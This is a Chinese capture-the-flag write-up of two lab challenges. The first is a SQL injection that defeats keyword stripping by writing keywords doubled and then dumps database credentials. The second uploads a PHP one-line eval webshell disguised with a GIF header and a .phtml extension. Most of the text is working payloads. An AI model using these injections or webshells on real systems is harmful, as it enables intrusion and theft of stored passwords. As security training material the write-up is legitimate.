【BUUCTF】 [极客大挑战2019] BabySQL
sql 注入 双写绕过
replace函数,找到union和select等替换为空
需要绕过的双写,单词中间拆开,分两半,里面藏一个完整的:
union
ununionion
select
seselectlect
from
frfromom
where
whwhereere
information
infoorrmation
(过滤了or)
order
oorrder
(过滤了or)
by
bbyy
常见URL编码
%20 空格
%23 #
%27 ’
1.尝试闭合标点符号引起报错
没有or,只有1=1,or被过滤了,双写
?username=admin&password=pwd %27 oorr 1=1 %23
by也被过滤了,双写
?username=admin&password=pwd %27 oorrder bbyy 3 %23
?username=admin&password=pwd %27 oorrder bbyy 4 %23
有三个字段
?username=admin&password=pwd ' union select 1 #
只讲了1# ,说明被检测到了union和select,双写联合查询看回显
?username=admin&password=pwd %27 ununionion seselectlect 1,2,3 #
不行…额,
#在这里必须用URL编码成%23,否则不行!
?username=admin&password=pwd %27 ununionion seselectlect 1,2,3 %23
爆库
?username=admin&password=pwd %27 ununionion seselectlect 1,2,group_concat(schema_name)frfromom (infoorrmation_schema.schemata) %23
?username=admin&password=pwd %27 ununionion seselectlect 1,2,database() %23
爆表
information被过滤了,双写
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct table_name) frfromom infoorrmation_schema.columns whwhereere table_schema = 'geek' %23
选择爆列
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(distinct column_name) frfromom infoorrmation_schema.columns whwhereere table_name = 'b4bsql'%23
查列
?username=admin&password=pwd ' ununionion seselectlect 1,2,group_concat(id,0x3a,username,0x3a,passwoorrd) frofromm b4bsql %23
[ACTF2020 新生赛]Upload
构造test.php(一句话木马),内容如下
GIF89a<script language="php">eval($_POST['shell']);</script>
抓包上传,将文件后缀改为phtml,上传成功,并且返回了相应的文件名称
再用中国蚁剑链接,查找目录完事